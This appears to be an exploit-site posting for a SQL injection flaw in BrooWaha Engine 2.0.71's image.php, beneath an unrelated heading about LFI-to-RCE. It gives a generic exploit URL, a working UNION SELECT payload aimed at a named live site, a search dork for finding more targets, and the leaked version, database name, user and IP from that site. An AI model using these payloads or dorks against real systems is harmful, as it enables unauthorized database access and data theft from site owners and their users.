LFI to RCE via access_log injection

BrooWaha Engine 2.0.71 SQL Injection Vuln


[o] BrooWaha Engine 2.0.71 SQL Injection Vulnerability
Software : BrooWaha Engine 2.0.71
Vendor : http://www.broowaha.com/
Author : NoGe

[o] Vulnerable file
image.php

[o] Exploit
http://localhost/[path]/image.php?id==[SQL]

[o] Proof of concept
http://london.broowaha.com/image.php?id=-5851+AND+1=2+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),1/*

[o] Dork
"Powered by BrooWaha Engine"

[o] Note
if you dont see the result, view the page source and you will see it. :)
the result from the example above will be like this after you view the page source.
4.0.27-max-log:db162098511:dbo162098511@74.208.16.88/-5851
this is a private script and all target are in one IP address.

Comments